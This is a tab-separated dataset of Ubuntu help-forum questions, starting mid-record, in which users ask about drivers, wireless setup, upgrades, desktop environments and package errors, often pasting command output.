can type text but nothing shows on the screen . the commands work , i just ca n't see anything . once i end the ssh connection and then re-connect it shows i have those same 6 packages available . the 6 packages it shows that are available are : base-files 6.5ubuntu6.4 libgudev-1.0-0 1:175-0ubuntu9.2 libgudev-1.0-0 : i386 1:175-0ubuntu9.2 libudev0 175-0ubuntu9.2 libudev0 : i386 175-0ubuntu9.2 udev 175-0ubuntu9.2 any ideas on why the upgrade is n't working properly ?
211400	temperature in gnome 3 panel	i 'm looking for a way to show my cpu-temperature in the gnome 3 panel in ubuntu 10.10 . i found a screen on extensions.gnome.org : is there an applet or sth . like that ? thank you !
211401	virtual box reconnect error	i have been using ubuntu and virtual box mounted xp on it , i suddenly experienced this error when i tried to open the folders shared on z : i have reinstalled guest additions but could not find a solution the error message is : an error occurred while reconnecting z : to \\vboxsvr\user the network could not be found the connection has not been restored
211402	installing ubuntu server 12.04 on highpoint rocketraid 2720sgl raid 5	i 've installed a highpoint rocketraid 2720sgl card that i 've connected 3 x 1.5 tb hdds . after creating a raid 5 within the rocketraid bios using the 3 disks , i am attempting to install ubuntu server 12.04 on the array . however , the installer is locking up during the detecting hardware phase . steps taken : i 'm using the standard ubuntu server 12.04 64-bit installation cd . in order to install the rocketraid drivers so the installer can recognize the raid array , i am using two driver packages from the highpoint website . rr272x_1x-ubuntu-11.10-x86_64-v1.4.12.0502.tgz ( drivers for ubuntu 11.10 ; latest ubuntu specific drivers ) rr272x_1x-linux-src-v1.4-120424-1752.tar.gz ( linux open source driver , which require a build against a kernel ) the rr272x_1x-ubuntu-11.10-x86_64-v1.4.12.0502.tgz driver has a preinst.sh script that is meant to load the driver while the ubuntu installer is `` loading additional components '' . at that point , you use alt + f2 to enter the console , mount the usb flash drive you have the driver package extracted to , and run the preinst.sh script . this is unsuccessful `` as is '' because the drivers included in this package are for the linux 3.0.0-12- ( generic/server ) kernel and 12.04 has the 3.2.0-29 kernel . to workaround this problem , i used the open source drivers listed above to build a driver off the 3.2.0-29-generic kernel , which i have on a ubuntu server 12.04 virtualbox vm . i extracted the archive and navigated to ../rr272x_1x-linux-src-v1.4/product/rr272x/linux and ran a make against the 3.2.0-29-generic kernel as outlined in the open source driver readme using the following sudo make kerneldir=/lib/modules/3.2.0-29-generic/build . this successfully builds the following rr272x_1x.ko . i take the resulting driver and gzip it into an archive that has the correct naming convention so the preinst.sh script will recognize it , rr272x_1x3.2.0-29-genericx86_64.ko.gz . i then place it in the boot folder of the extracted rr272x_1x-ubuntu-11.10-x86_64-v1.4.12.0502.tgz package , which is where it is supposed to be . when launching into the console during the ubuntu installation , this time the preinst.sh script runs successfully . i then press alt + f1 to go back to the installer and continue until i hit the `` detecting hardware '' phase , which is where the whole operation locks up . i 've tested the ubuntu installation cd and it does n't have any errors . i 've also attempted this process multiple times in case it was a one time lockup , but it continues to lock up in the same place . can anyone offer insight on what i may be doing incorrectly here ? note : the installer will progress past the detecting hardware phase if the rocketraid drives are not loaded , so i know it is something with the driver causing the issue .
211404	how to reset bash keyboard shortcuts ?	how can i reset the bash shell 's ctrl + c keyboard shortcut ? i changed it a few months ago and ca n't seem to recover it .
211405	how to install drivers for geforce fx 5500 in ubuntu 12.10 ?	i ca n't manage to install drivers for my video card . similar questions did n't help me , because they were outdated . what i tried were to following : tried sudo apt-get install nvidia-173 , dependency issues tried to downgrade xorg packages to solve this dependency issue , no luck , they were still present tried to download driver from nvidia 's homepage , and install that the last one seems the only way that could succeed , but while installing i 'm getting errors related to kernel sources . i did sudo apt-get install linux-source . error : if you are using a linux 2.4 kernel , please make sure you either have configured kernel sources matching your kernel or the correct set of kernel headers installed on your system . if you are using a linux 2.6 kernel , please make sure you have configured kernel sources matching your kernel installed on your system . if you specified a separate output directory using either the `` kbuild_output '' or the `` o '' kbuild parameter , make sure to specify this directory with the sysout environment variable or with the equivalent nvidia-installer command line option . depending on where and how the kernel sources ( or the kernel headers ) were installed , you may need to specify their location with the syssrc environment variable or the equivalent nvidia-installer command line option . log entries : using : nvidia-installer ncurses user interface - > license accepted . - > installing nvidia driver version 173.14.28 . - > running distribution scripts executing : '/usr/lib/nvidia/pre-install ' ... - > done . - > the distribution-provided pre-install script failed ! continue installation anyway ? ( answer : yes ) - > not probing for precompiled kernel interfaces . - > performing cc sanity check with cc= '' cc '' . - > kernel source path : '/lib/modules/3.5.0-17-generic/build' - > kernel output path : '/lib/modules/3.5.0-17-generic/build' i 'm pretty sure it can be done by the official nvidia installer , but i did n't see any help ( which is useful in my case ) on the internet .
211409	is there classic mode in ubuntu 12.10 ?	my computer is older ( it has a radeon 9200 video card ) and it just does n't seem to be able to handle unity . is there some way that i can set for the desktop to start up in classic mode instead ? thanks .
211414	where did ~/.gvfs go on ubuntu 12.10 ?	where did ~/.gvfs go on ubuntu 12.10 . how can i find the locaton of the mounted through samba folders ? i share a folder with a ubuntu 12.10 machine . i am trying to find the location of the mount point on another ubuntu 12.10 machine that i 've mounted it . it is mounted successfully . it is on the nautilus sidebar . but i can not find the location as on 12.04 which was ~/.gvfs/blabla to use the folder in an app . thank's
211415	automatic mount of external hard disk fails	i am running ubuntu precise and have the following external hard disk : $ sudo blkid | grep elements /dev/sdb1 : label= '' elements '' uuid= '' e6daad35-1f57-4281-8683-a03c20cfc5a3 '' type= '' ext4 '' my etc/fstab has this line at the end : $ sudo cat /etc/fstab | tail -1 uuid=e6daad35-1f57-4281-8683-a03c20cfc5a3 /media/elements ext4 defaults , uid=1000 , gid=1000 , umask=007 0 2 yet , when the system boots i get a message `` an error occurred while mounting /media/elements '' . once i am in , a simple mount from the console succeeds : sudo mount /dev/sdb1 /media/elements/ what 's wrong with my setup that does n't allow ubuntu to mount the external drive automatically at boot time ?
211416	clipboard manager for 12.04 unity	what clipboard manager can be used for ubuntu 12.04 64 bit unity ? i tried parcellite and glipper - both not working . parcellite remains invisible , glipper crashes .
211420	how to configure terminal 's size and location	i am running ubuntu precise . i usually rely on the alt-ctrl-t shortcut to open a new terminal . however the location is pops up as well as its size are not very convenient and i have to subsequently use the mouse to drag/resize the terminal . is there a way to configure the terminal 's initial size and location ?
211423	trying to setup wireless	i 'm trying to set up wireless on vostro 1520 dell laptop , with latest ubuntu install . here 's the output of some of the commands that i was told to run : lshw -c network viggy @ ubuntu : ~ $ lshw -c network warning : you should run this program as super-user . *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:08:00.0 logical name : eth0 version : 03 serial : 00:24 : e8 : da:84:25 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8168d-1.fw ip=192.168.2.6 latency=0 multicast=yes port=mii speed=100mbit/s resources : irq:47 ioport:3000 ( size=256 ) memory : f6004000-f6004fff memory : f6000000-f6003fff memory : f6020000-f603ffff *-network description : network controller product : bcm4312 802.11b/g lp-phy vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0e:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : bus_master cap_list configuration : driver=b43-pci-bridge latency=0 resources : irq:18 memory : fa000000-fa003fff *-network disabled description : wireless interface physical id : 1 logical name : wlan0 serial : 0c:60:76:05 : ee:74 capabilities : ethernet physical wireless configuration : broadcast=yes driver=b43 driverversion=3.2.0-29-generic firmware=n/a multicast=yes wireless=ieee 802.11bg lspci 00:00.0 host bridge : intel corporation mobile 4 series chipset memory controller hub ( rev 07 ) 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:02.1 display controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:1a.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 03 ) 00:1a.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 ( rev 03 ) 00:1a.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 03 ) 00:1a.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 03 ) 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) 00:1c.0 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 1 ( rev 03 ) 00:1c.1 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 2 ( rev 03 ) 00:1c.2 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 3 ( rev 03 ) 00:1c.3 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 4 ( rev 03 ) 00:1c.4 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 5 ( rev 03 ) 00:1c.5 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 6 ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev 93 ) 00:1f.0 isa bridge : intel corporation ich9m lpc interface controller ( rev 03 ) 00:1f.2 sata controller : intel corporation 82801ibm/iem ( ich9m/ich9m-e ) 4 port sata controller [ ahci mode ] ( rev 03 ) 00:1f.3 smbus : intel corporation 82801i ( ich9 family ) smbus controller ( rev 03 ) 08:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 03 ) 0e:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) 1a:00.0 firewire ( ieee 1394 ) : o2 micro , inc. device 10f7 ( rev 01 ) 1a:00.1 sd host controller : o2 micro , inc. device 8120 ( rev 01 ) 1a:00.2 mass storage controller : o2 micro , inc. device 8130 ( rev 01 ) iwconfig lo no wireless extensions . wlan0 ieee 802.11bg essid : off/any mode : managed access point : not-associated tx-power=0 dbm retry long limit:7 rts thr : off fragment thr : off power management : on eth0 no wireless extensions . ** update ** here 's the output of running sudo apt-get install firmware-b43-lpphy-installer : reading package lists ... done building dependency tree reading state information ... done the following package was automatically installed and is no longer required : dkms use 'apt-get autoremove ' to remove them . the following packages will be removed : firmware-b43-installer the following new packages will be installed : firmware-b43-lpphy-installer 0 upgraded , 1 newly installed , 1 to remove and 79 not upgraded . need to get 3,390 b of archives . after this operation , 1,024 b disk space will be freed . do you want to continue [ y/n ] ? y get:1 http : //us.archive.ubuntu.com/ubuntu/ precise/multiverse firmware-b43-lpphy-installer all 1:015-9 [ 3,390 b ] fetched 3,390 b in 0s ( 27.3 kb/s ) ( reading database ... 187405 files and directories currently installed . ) removing firmware-b43-installer ... selecting previously unselected package firmware-b43-lpphy-installer . ( reading database ... 187402 files and directories currently installed . ) unpacking firmware-b43-lpphy-installer ( from ... /firmware-b43-lpphy-installer_1 % 3a015-9_all.deb ) ... setting up firmware-b43-lpphy-installer ( 1:015-9 ) ... no chroot environment found . starting normal installation -- 2012-11-06 00:50:49 -- http : //downloads.openwrt.org/sources/broadcom-wl-4.178.10.4.tar.bz2 resolving downloads.openwrt.org ( downloads.openwrt.org ) ... 78.24.191.177 connecting to downloads.openwrt.org ( downloads.openwrt.org ) |78.24.191.177|:80 ... connected . http request sent , awaiting response ... 200 ok length : 5986780 ( 5.7m ) [ application/octet-stream ] saving to : `broadcom-wl-4.178.10.4.tar.bz2 ' 100 % [ ================================ > ] 5,986,780 1.59m/s in 5.3s 2012-11-06 00:50:55 ( 1.07 mb/s ) - `broadcom-wl-4.178.10.4.tar.bz2 ' saved [ 5986780/5986780 ] broadcom-wl-4.178.10.4/ broadcom-wl-4.178.10.4/config/ broadcom-wl-4.178.10.4/config/wlconfig_nomimo broadcom-wl-4.178.10.4/config/wlconfig_lx_router_apsta_1chipg broadcom-wl-4.178.10.4/config/wlconfig_lx_wl_sdstd broadcom-wl-4.178.10.4/config/wlconfig_lx_shared broadcom-wl-4.178.10.4/config/diffupdate.sh broadcom-wl-4.178.10.4/config/wlconfig_lx_router_ap_1chipg broadcom-wl-4.178.10.4/config/wlconfig_lx_router_ap broadcom-wl-4.178.10.4/config/wlconfig_lx_router_ap_sdstd broadcom-wl-4.178.10.4/config/wl.mk broadcom-wl-4.178.10.4/config/wltunable_lx_router.h broadcom-wl-4.178.10.4/config/wlconfig_lx_router_sta broadcom-wl-4.178.10.4/config/wl_default broadcom-wl-4.178.10.4/config/wltunable_lx_router_1chipg.h broadcom-wl-4.178.10.4/config/wl_hnd broadcom-wl-4.178.10.4/config/wlconfig_lx_router_sta_1chipg broadcom-wl-4.178.10.4/config/wlconfig_lx_router_apsta broadcom-wl-4.178.10.4/config/wlconfig_apdef broadcom-wl-4.178.10.4/readme broadcom-wl-4.178.10.4/linux/ broadcom-wl-4.178.10.4/linux/wl_sta.o broadcom-wl-4.178.10.4/linux/wl.o broadcom-wl-4.178.10.4/linux/wl_ap.o broadcom-wl-4.178.10.4/linux/wl_apsta.o this file is recognised as : filename : wl_apsta.o version : 478.104 md5 : bb8537e3204a1ea5903fe3e66b5e2763 extracting b43/ucode5.fw extracting b43/pcm5.fw extracting b43/b0g0bsinitvals5.fw extracting b43/a0g0bsinitvals5.fw extracting b43/b0g0initvals5.fw extracting b43/a0g1initvals5.fw extracting b43/a0g0initvals5.fw extracting b43/a0g1bsinitvals5.fw extracting b43/ucode9.fw extracting b43/a0g1initvals9.fw extracting b43/a0g0bsinitvals9.fw extracting b43/b0g0bsinitvals9.fw extracting b43/b0g0initvals9.fw extracting b43/a0g1bsinitvals9.fw extracting b43/a0g0initvals9.fw extracting b43/ucode11.fw extracting b43/n0bsinitvals11.fw extracting b43/n0absinitvals11.fw extracting b43/n0initvals11.fw extracting b43/ucode13.fw extracting b43/b0g0initvals13.fw extracting b43/a0g1bsinitvals13.fw extracting b43/a0g1initvals13.fw extracting b43/lp0bsinitvals13.fw extracting b43/b0g0bsinitvals13.fw extracting b43/lp0initvals13.fw extracting b43/ucode14.fw extracting b43/lp0initvals14.fw extracting b43/lp0bsinitvals14.fw extracting b43/ucode15.fw extracting b43/lp0bsinitvals15.fw extracting b43/lp0initvals15.fw extracting b43/ucode16.fw extracting b43/n0bsinitvals16.fw extracting b43/sslpn0initvals16.fw extracting b43/n0initvals16.fw extracting b43/lp0initvals16.fw extracting b43/sslpn0bsinitvals16.fw extracting b43/lp0bsinitvals16.fw
211425	installing a tgz file	i have downloaded a .tgz file which when extracted gives me two files called `` eula.txt '' and `` install.pl '' but i have no idea what to do and how to install them , can anyone help please
211426	unable to change user password in ubuntu 12.10	the user password is not changing for some reason . in the terminal it says password updated successfully , $ sudo passwd [ sudo ] password for zaigham : enter new unix password : retype new unix password : passwd : password updated successfully but when i try to log in using the new password it does n't work . i have changed my password 2 , 3 times now but still it 's the same . is that some kind of bug ?
211430	my system wo n't boot after install of 12.10	i just finished installing 12.10 on my desktop . i chose to erase the current data on the drive and start fresh . when my system attempts to boot now , it does n't see an available operating system at all . i have tried using boot-repair to no avail . is there anyway to get my system back into a bootable state ?
211434	what is the package name for jvm ?	if i want to know if skype is installed , i would type this : viggy @ ubuntu : ~ $ apt-cache policy skype skype : i386 : installed : 4.0.0.8-1 candidate : 4.0.0.8-1 version table : *** 4.0.0.8-1 0 100 /var/lib/dpkg/status or if eclipse is installed : viggy @ ubuntu : ~ $ apt-cache policy eclipse eclipse : installed : ( none ) candidate : 3.7.2-1 version table : 3.7.2-1 0 but let 's say i want to know if the java virtual machine is installed . how would i know what to pass to apt-cache policy ? for example , you might not know what to pass to apt-cache policy for some programs : viggy @ ubuntu : ~ $ apt-cache policy java n : unable to locate package java viggy @ ubuntu : ~ $ apt-cache policy jvm n : unable to locate package jvm
211447	12.04 scanner works fine as super-user but is not recognised as a normal user	i have an all-in-one printer epson sx130 , wich i have just tried to install . i got the printer working with no problem , but i could n't set the scanner up . i have had another all-in-one printer before ( brother dcp-125c ) , and had just the same problem , so i decided to try the same trick i used to do then , running the scanning program as super-user : $ sudo simple-scan and $ sudo xsane once again , it worked just fine , and i could use the scanner . anyhow , this solution is a little annoying , because i also have to change the permissions to the files i get scanning like this . i have been searching the internet for solutions and got to know this must have something to do with user groups permissions , but could n't find a satisfying solution . is there anyone with an idea ? thank you in advance .
211452	rebooting from dvd but keeps starting windows 7	i have created the ubuntu dvd but when i choose to boot from dvd drive on start up it automaticallt loads windows 7 . please can you help ? ?
211456	what is alternative to unity 's lens for gnome shell ?	is there any functionality like lens for gnome shell ? or any modified version of gnome shell .
211458	ubuntu 12.10 crashing compiz/unity ( not nvidia related )	i 've upgraded from 12.04 to 12.10 and compiz and/or unity are constantly crashing rendering my computer useless ( no top bar , no dash , no window decorations ) . i have just discovered that when i login with the guest account everything seems to be working ok . i 've been through all the threads i could find and have n't found a resolution . this is n't nvidia related ( i am running on a system76 laptop with ati radeon ) . is there any way i can go about isolating the problem and restore my user account ?
211460	lubuntu 12.04 is a non-lts release - does this mean that lxde is n't , either ?	lubuntu 12.04 is not a long-term-support release . that 's mostly due to a lack of manpower . but i do n't use lubuntu on my machine , i use lxde over stock ubuntu 12.04 lts . so my question is : in the next five years , will there be security updates and bug fixes for lxde-packages such as openbox , pcmanfm and lxsession ? or does the `` lts '' in 12.04 lts only include stock unity packages ? i guess this question is just as relevant for any other de out there .
211464	how to remove `` online accounts '' from `` system settings '' ?	i uninstalled `` unity '' and use `` gnome shell '' instead , but the new `` online accounts '' was still in the `` system settings '' menu . how can i completely remove it ? i tried the command below but it does n't work : sudo apt-get -y remove unity-lens-shopping account-plugin-aim account-plugin-facebook account-plugin-flickr account-plugin-google account-plugin-icons account-plugin-identica account-plugin-jabber account-plugin-salut account-plugin-twitter account-plugin-windows-live account-plugin-yahoo gnome-online-accounts
211466	install openni ubuntu 11.10	i can not find install instructions for openni ubuntu 11.10 anywhere on the internet . does anyone have a link to how to get it up and running or how i can get started ?
211467	which are the radio stations are compatible to radiotray ?	i had some trouble in searching and adding radio stations to radiotray . it will be extremely helpful if some one lists radio stations which work on radiotray . rock , hard rock , metal , traditional metal , symphonic metal , rap are my preferred genres but any others are welcome . my focus is on stations which have been tried on radiotray . also i would like indian radio channels as i ca n't find any .
211476	intel pentium m with ubuntu 12.10 / ppa needed	i need the ppa too . i 've updated yet my thinkpad t42 from lubuntu 12.04 to 12.10 . everytime i want to install or update something i get this error : e : unerfüllte abhängigkeiten . versuchen sie apt-get -f install« ohne angabe eines pakets ( oder geben sie eine lösung an ) . if i try apt-get -f install i earn this : /var/cache/apt/archives/linux-image-3.5.0-17-generic_3.5.0-17.28_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) is there a possibility to use 12.10 with intel pentium m processors ?
211477	how to remove gpt from hdd ?	i have a asus k55vm-sx027v laptop and i formated it with ubuntu because whenever i tried to install windows 7 64bit , it would n't let me because my hdd had gpt protection . now that i have ubuntu 12.10 , how do i remove gpt protection from my laptop ?
211478	how to recognize special function keys on keyboard	i have a microsoft digital media 3000 keyboard . none of the function keys or other special keys seem to do anything , what do i need to do to get them working ( at the very least f2 , as not having a shortcut to rename a file is driving me mad ) if i run xev and press f2 i get the following output in the terminal : keypress event , serial 36 , synthetic no , window 0x4800001 , root 0x15d , subw 0x0 , time 42858728 , ( 674,456 ) , root : ( 1034,588 ) , state 0x10 , keycode 139 ( keysym 0xff65 , undo ) , same_screen yes , xlookupstring gives 0 bytes : xmblookupstring gives 0 bytes : xfilterevent returns : false keyrelease event , serial 36 , synthetic no , window 0x4800001 , root 0x15d , subw 0x0 , time 42858912 , ( 674,456 ) , root : ( 1034,588 ) , state 0x10 , keycode 139 ( keysym 0xff65 , undo ) , same_screen yes , xlookupstring gives 0 bytes : xfilterevent returns : false
211486	( easy question ) start x and unity from console	a lot of questions without response . this thread is like this two : start x and unity from the console how to start x and unity , without gdm ? i want to start x without lighdm , with unity or gnome desktop . some says its not possible , others to modify xinitrc . i want to close this rigmarole : first of all : in /etc/default/grub change `` quiet splash '' for `` text '' then sudo update-grub then reboot - > we get to the login of tty1 to start x server i have used startx . it looks for xinitrc of the user logged in and if not , check their configuration file . that starts x without unity panel nor top bar . open terminal and tried unity -- replace . now unity appears ok but slowed down very much . other try was running `` unity '' in tty1 directly . same result . other try - > xinitrc - > exec unity - > same result other try - > xinitrc - > exec gnome-session session=ubuntu - > same result every time i reach unity it is slowed down and impossible to handle . if i start x with lightdm it run smothly . so lightdm have the answer . it runs some command that we missed . sum up : i want to start ubuntu like when loggin with lightdm but loggin from terminal instead . anyone ?
211492	lightdm : select window manager ( disappeared ? )	cant select with what window manager want to start x. i think its for unity-greeter . the icon that appears next to your username and let you start x with unity-2d , gnome , unity , kde , etc have gone and i cant switch . i dont want to change my default window manager , only switch it on the lightdm screen . it has disappeared in ubuntu 12.10 i think . anyone ?
211497	12.10 - ca n't connect to internet in software updater	when i try the software updater , it tells me that it failed to download repository information and i should check my internet connection . of course my internet works . the error it reproduces is below w : gpg error : http : //www.duinsoft.nl debs release : the following signatures could n't be verified because the public key is not available : no_pubkey e18ce6625cb26b26 , w : failed to fetch http : //ppa.launchpad.net/eugenesan/java/ubuntu/dists/quantal/main/source/sources 404 not found , w : failed to fetch http : //ppa.launchpad.net/eugenesan/java/ubuntu/dists/quantal/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead.` how do i fix this ?
211504	transmission wo n't connect to any peers	after my upgrade from ubuntu 12.04 lts to 12.10 , transmission wo n't download from an anti-leech tracker ( alt ) . if i download a torrent via magnet link , everything works fine , but if i download from that alt , it does n't . the tracker will return ok and also return the list of seeders and leechers ( each greater than 20 ) , but no peers to download from are returned . everything worked fine previous to the upgrade . for testing purposes i downloaded ktorrent . the same occured there . i had transmission running for as long as 10 hours and no success . my port is open and even if the firewall is disabled , this still happens .
211511	my computer ca n't connect to my wifi	i am incredibly new to using linux of any kind . i 'm trying this on my netbook just to learn what it is about , and i 'm really struggling with getting it connected to the wifi . i have just installed ubuntu 12.0 on it . i 've replaced windows altogether so it 's not a dual-boot or anything . i was able to connect using an ethernet cable to get it up and running , but my wifi just will not connect . instead of the wifi symbol i have a little computer monitor . it behaves as if it is connected , but it does not let me use firefox to browse anything at all . i have been scouring forums and using the help in ubuntu but it all looks very confusing to me , and i 'm afraid of breaking something since i 'm not sure what i am doing . does anyone have any help for me at all ? i 'm kind of at my wit 's end ...
211512	download to usb stick	i downloaded 12.10 and i 'm trying to put it on a usb stick , but when i got it downloaded , it opened a disc burner . i do n't have any blank discs and the download is nowhere to be found .
211517	recovering ubuntu with lubuntu live cd	my younger sister 's computer suffered some major problems recently . the bios corrupted and attempted to load ubuntu 10.04 in a way it should n't have . i 'm not sure of the exact details , but the computer would n't start . anyway , i put the drive in a new computer and attempted to recover it with a lubuntu live cd . when i access her root folder on the mounted drive , it tells me i ca n't . what do i do ? i 'm not that experienced with linux . here is the error message we get : error opening directory '/media/lubuntu/string-of-numbers/home/user ' permission denied .
211518	laptop monitor is cut off when using an external display ( 12.04 + unity )	update : bug is described here . the `` problem '' still allows functionality . i have 12.04 on a t61 thinkpad . the indicator/menu bar is rendered correctly on both screens and everything with unity/dash is fine . the main `` problem '' is that the icons on my desktop do n't show up ( normally they are top left ) and now they are off the screen . i can see them by going to the desktop folder ( aka /home/ $ user/desktop ) . if there are more than a couple icons , the later ones start to show up . not sure if it matters , but the same thing happens with vga connection between the external monitor and the laptop , as well as with the docking station and with both vga and dvi .
211522	can not see updated files from ubuntu one	i had ubuntu one working for a while . now , i ca n't see updated files on the file system anymore , even though ubuntu one and magic data indicates the files are being downloaded . when i edit the file on my phone and sync with ubuntu one , the changes show up on the web page . the notification on my laptop tells me that 5 files are being downloaded , but i do n't see any changes in either the file time stamp or content . i verified that the paths have not changed on my laptop . to try to force the download again , i unchecked the `` always in sync '' box in ubuntu one and check it again . again , the notifier said that it 's downloading files , although i question this because if it downloaded it the previous time , why is it downloading again . magicdata also shows that files were downloaded when i did the un-checking and checking of `` always in sync '' . but i see no change on the system . is there a log of the actions ubuntu one took ? will it tell me if there was some errors occurring during the downloading ?
211525	rhythmbox cant play any mp3 network file	i can open and see any kind of file of a specific hdd on the network . all is working fine , except that i ca n't play any .mp3 file ( directly from the network ) . when i open the file , rhythmbox try to load it ( it takes a few long seconds ) and then i have the next output : problem occurred without error being set . this is a big in rhythmbox or gstreamer . this only happens with mp3 files . if i play the file with another sound player , i do n't have any problem . so is n't the codec , but the program . what can i do to play mp3 file with rhythmbox ?
211530	unmet dependencies error when installing wine	the following packages have unmet dependencies : wine1.5 : depends : wine1.5-i386 ( = 1.5.16-0ubuntu1 ) but it is not installable recommends : gnome-exe-thumbnailer but it is not going to be installed or kde-runtime but it is not going to be installed recommends : ttf-droid recommends : ttf-mscorefonts-installer but it is not going to be installed recommends : ttf-umefont but it is not going to be installed recommends : ttf-unfonts-core but it is not going to be installed recommends : winbind but it is not going to be installed recommends : winetricks but it is not going to be installed e : unable to correct problems , you have held broken packages . i get this error when trying to install wine . please help !
211536	using the insert key as a hotkey	i recently started using parcellite , i love the program but ca n't get the shortcuts working the way i want . i want 'insert ' to bring up the history menu , i tried setting it to but it did n't work . i probably just do n't know the correct name for the key . thanks in advance .
211537	hp pavilion g6 - 64 bit high temperature	i have ubuntu 12.04 and my temperatures are constantly over 55째c i 've tried jupiter power saving mode without results . i 've tried installing ati proprietary drivers but there was n't a significant change ; although there is a post-installation upgrade driver ubuntu is not able to install , due to some errors i ca n't understand . i 've not yet tried opening and cleaning the laptop , but i do n't think this could be the problem , since on windows , on the same laptop , the temperatures are lower . ( when on ubuntu i can physically sense the heat coming a side of the pc ) . what else should i tried ?
211538	native ubuntu ( libnotify ) notifications from google+ ( plus ) what 's happening ?	after ubuntu 12.10 fresh install i 'm sometimes seeing native ubuntu notifications from the google+ `` explore tab '' . this happens ( as far as i know ) only when i 'm logged onto the g+ website . it seems they appear in the order just like they are posted in g+ . ( from top down ) i do n't know how to reproduce it . i have only noticed it 3-4 times . when they come they come one after another until `` all '' are shown ... how to control it ? ( i would love to have that kind of notification for posts for me . )
211542	how to install hasselblad phocus on ubuntu 12.04	i am a photographer and i have recently switched to ubuntu . i used to use hasselblad 's phocus on my windows pc and i would like to continue to use it here as well . i have already installed wine but the programme 's installation fails every single time i try . can anyone help ? thanks in advance .
211552	problems downloading server 12.10	i 've been trying to download the iso for server 12.10 amd64 for a week now . none of the md5 checksums match the posted values . i am not having any problems downloading from other sites , and i 've tried the download from multiple computers .
211555	ubuntu 12.04 can not connect to wireless network ( wireless card unspecified )	i have just recently installed 12.04 and i ca n't seem to get it to hook up to my wireless network . i tried plugging it in directly and it worked . any suggestions ?
211556	authentication problem -- locked out from changes	i am really frustrated about the authentication password . when i try to install , download or update a software from software menu , i am always asked to enter the password to authenticate . i did n't even know whether i had a password or not . could you please help me ?
211557	can not install ubuntu due to a `` problem mounting the file '' error	i downloaded ubuntu 12.10 iso image ; but when i click on it , i get a 'sorry , there was a problem mounting file ' error message . the same thing happens after i downloaded the 12.4 lts version too . i am on windows 8 . thank you
211561	unity launcher recovery	i recently added cairo-dock which worked fine until i added a 2nd dock at the top left of the screen . since then , my computer has consistently reported system errors . how do i get the unity launcher back ? i 've have clicked `` remove '' for the cairo dock in the software section ; it tells me it is removed , but yet it remains . feels a bit like `` hal '' from 2001 . any suggestions ?
211564	ralink rt2860 not working anymore in ubuntu 12.10	i just upgraded from ubuntu 12.04 to 12.10 , however , my network card is not working anymore . when i had 12.04 installed , i just had to download the driver from ralink , go to the directory and enter : make sudo make install this made my network card work . when i try to do this in 12.10 , it seems like it works , but it does n't . i can enable the module , it recognizes the network card , but i am unable to connect to any wireless network . how can i get my wireless card working again ? if anyone knows a solution , please tell me . thanks in advance .
211567	ubuntu 12.10 tty console ( ctrl+alt+f [ 1-6 ] ) not working	i 've been a ubuntu user for some time now . i have a very annoying problem , i have no idea what causes it , and i have n't managed to find anything relevant after googling like crazy . the problem is my tty consoles are not working . usually , these are activated using ctrl alt f [ 1-6 ] . it was working when i was using the nouveau drivers , but after installing the nvidia proprietary drivers , instead of getting a terminal console i get a strange monochrome pattern that slowly fades away . does anyone know how to get ctrl + alt + f [ 1-6 ] working again ?
211569	install extra compiz plugins ( burn ) and ( groups & tabs )	how to install these plugins in ubuntu 12.10 ? i watched some videos for installation and using them , but i didnt find any thing ! help please
211574	multiple users same desktop	i have my desktop set up how i like it for my admin ( root ) user ( cinnamon ) i want to create a non-admin account , but keep the same desktop setup as the root . how to do this ? thanks in advance .
211575	gameboy advance emulator for lucid ? ( no wine )	does anybody know of any good gba emulators for lucid ? i ca n't run wine on this , so i really need help .
211578	what 's the difference between ddrescue , gddrescue , and dd_rescue ?	the dd command is commonly used to make image backups of a drive or partition . however , it performs poorly if the source drive is unreliable or failing . i read that ddrescue/dd_rescue is a good tool to use to recover an image from a bad drive , since it intelligently attempts to re-read sectors that it failed to read the first time . but in the ubuntu repositories , i see two different ddrescue programs , with 3 different but similar names showing up in different places : ddrescue , gddrescue , dd_rescue . what 's the difference ?
